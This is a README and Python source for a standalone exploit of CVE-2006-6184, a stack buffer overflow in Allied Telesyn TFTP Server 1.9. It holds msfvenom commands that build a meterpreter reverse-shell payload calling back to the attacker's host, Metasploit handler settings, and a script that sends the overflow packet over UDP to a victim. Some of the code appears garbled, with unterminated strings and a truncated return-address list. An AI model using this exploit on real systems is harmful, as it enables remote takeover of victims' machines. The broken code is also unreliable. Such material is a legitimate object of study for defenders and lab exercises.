
# CVE-2006-6184 AT-TFTP1.9緩衝區溢出漏洞

# CVE-2006-6184
This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflow in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allowing remote attackers to cause a denial of service or execute arbitrary code.

### Instructions (Updated for 2020)
The payload must be customized to include your own IP address and listening port, so you'll need to generate it manually.
To do so, use the following steps:
1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Next, use the following command to create a staged meterpreter shell payload:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) Then, combine the two files you just created.
cat stackadj payload > shellcode

4.) Finally, let's eliminate the bad characters.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python

Enter the output as the value of the "payload" variable. You may need to run this exploit a few times for it to work.

### Metasploit Listener
1. use exploit/multi/handler
2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
3. set ExitOnSession false
4. set AutoRunScript post/windows/manage/migrate
5. exploit -j

# Standalone exploit for Allied Telesyn TFTP Server 1.9
# Written by daleksec 07/21/2016
# Special thanks to for the excellent walk through (see

import sys, socket
if len(sys.argv)<=2:
 sys.exit('''Usage: python    

 0	Windows NT SP4 English
 1	Windows 2000 SP0 English
 2	Windows 2000 SP1 English
 3	Windows 2000 SP2 English
 4	Windows 2000 SP3 English
 5	Windows 2000 SP4 English
 6	Windows XP SP0/1 English
 7	Windows XP SP2 English
 8	Windows XP SP3 English
 9	Windows Server 2003
 10	Windows Server 2003 SP2
host	= sys.argv[1]		# Victim's IP
port	= int(sys.argv[2])	# Victim's Port
lhost	= sys.argv[3]		# Attacker's IP
os	= int(sys.argv[4])	# OS Choice
ret	= []			# Define array containing return addresses

# Define return addresses (Source: Metasploit)
ret = ["\xf7\xa6\x2e\x70",

nop	= "\x90" * (25-len(lhost))	# Create a NOP string as to bring NOPs + LHOST up to 25 bytes

# The payload must be customized to include your own IP address and listening port, so you'll need to generate it manually.
# To do so, use the following steps:
# 1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):
# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
# 2.) Next, use the following command to create a staged meterpreter shell payload:
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
# 3.) Then, combine the two files you just created.
# cat stackadj payload > shellcode
# 4.) Finally, let's eliminate the bad characters.
# msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
# Enter the output as the value of the "payload" variable. You may need to run this exploit a few times for it to work.

payload	= "" # Payload (bad characters = \x00, stack adjustment = -3500, can't exceed 210 bytes of space)
# payload += ""
# payload += ""
# ...

exploit	= "\x00\x02" + nop + payload + ret[os] + "\x83\xc4\x28\xc3\x00netascii\x00" 	# Our exploit so far 

client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)	# Declare a UDP socket
client.sendto(exploit, (host, port))				# Send the exploit over UDP to the nominated addresses

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